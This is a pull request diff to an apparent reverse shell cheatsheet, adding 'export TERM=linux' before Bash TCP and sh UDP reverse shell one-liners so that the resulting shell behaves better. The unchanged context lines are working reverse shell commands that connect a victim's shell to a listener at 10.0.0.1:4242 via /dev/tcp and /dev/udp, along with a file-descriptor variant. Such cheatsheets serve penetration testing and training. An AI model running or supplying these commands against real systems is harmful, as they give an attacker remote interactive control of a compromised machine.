### PR TITLE
exported Term=linux

### DIFF
--- a/Methodology and Resources/Reverse Shell Cheatsheet.md
+++ b/Methodology and Resources/Reverse Shell Cheatsheet.md
@@ -50,6 +50,7 @@
 ### Bash TCP
 
 ```bash
+export TERM=linux
 bash -i >& /dev/tcp/10.0.0.1/4242 0>&1
 
 0<&196;exec 196<>/dev/tcp/10.0.0.1/4242; sh <&196 >&196 2>&196
@@ -61,6 +62,7 @@ bash -i >& /dev/tcp/10.0.0.1/4242 0>&1
 
 ```bash
 Victim:
+export TERM=linux
 sh -i >& /dev/udp/10.0.0.1/4242 0>&1
 
 Listener:


### PR DESCRIPTION
-sets the terminal emulator to Linux, Depending on the environment and capability of the console you're using, some emulations will work better than others.
- this will give us access to term commands such as clear, results in a better shell